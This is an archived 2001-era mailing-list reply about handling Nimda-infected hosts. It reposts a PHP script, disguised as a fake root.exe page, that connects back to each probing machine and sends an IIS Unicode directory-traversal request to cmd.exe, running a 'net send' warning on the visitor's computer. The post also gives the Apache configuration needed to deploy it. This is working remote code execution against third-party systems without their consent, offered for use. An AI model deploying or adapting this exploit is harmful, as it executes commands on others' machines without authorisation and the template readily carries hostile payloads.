--- "Deus, Attonbitus" <Thorat_private> wrote: -- snip -- > 1) Recommended. Go for it and publish the IP's and > let the "Gods of IP" > sort out the damage. > 2) A Bad Thing. These are innocent victims, and > you will just have them be > attacked by evil people. > 3) Boring. Who cares? It's Nimda, and an everyday > part of life. Deal with > it and ignore the logs. > > If "1," then I was thinking of going with a "Hall > of Shame" and providing > ARIN look ups, contacts, and the whole bit. I > could even allow other > people to post logs there and stuff like that... > > Input appreciated. How about another option (4. warn the infected) as proposed in this slashdot post (text follows): http://slashdot.org/comments.pl?sid=21830&cid=2329699 I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe" <?php /* Open a connection to the offender */ $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5); /* Check to see if the connection actually opened */ if ($fp) { /* URL-encode the message... */ $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information."); /* ...and send it */ fputs ($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n"); /* close the connection (though it probably got closed automatically) */ fclose ($fp); } /* for fun and confusion.. */ header ("HTTP/1.0 404"); echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"); echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" ); echo ("<h1>Not Found</h1>\n"); echo ("The requested URL $SCRIPT_NAME was not found on this server.\n"); echo ("</body></html>\n"); echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n"); echo ("</body></html>\n"); $res = "dirty\r\n"; $log = fopen("/tmp/nimda.log", "a"); fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res); fclose($log); ?> Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right? Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put this type in like this: AddType application/x-httpd-php .php .php3 .exe Now restart Apache by issuing one of either: /etc/rc.d/init.d/httpd restart apachectl restart That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimba.log. __________________________________________________ Do You Yahoo!? Yahoo! Health - your guide to health and wellness http://health.yahoo.com
This archive was generated by hypermail 2b30 : Tue May 07 2002 - 13:35:46 PDT